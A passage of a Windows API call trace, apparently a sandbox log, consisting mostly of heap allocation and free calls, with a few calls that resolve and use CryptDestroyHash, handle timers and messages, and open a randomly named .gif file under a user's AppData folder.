Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0237.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699a8 [0237.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0237.061] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0237.061] CryptDestroyHash (hHash=0xa87050) returned 1 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0237.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0237.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0237.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0237.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0237.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0237.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0237.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0237.234] TranslateMessage (lpMsg=0x8cf708) returned 0 [0237.234] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0237.234] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0237.234] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0237.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0237.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0237.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0237.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0237.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0237.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0237.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0237.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0237.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0237.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0237.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0237.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0237.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0237.236] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PXFkhPM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pxfkhpm.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0237.236] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.236] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0237.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0237.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0237.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0237.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0237.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0237.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0237.238] RtlAllocateHeap 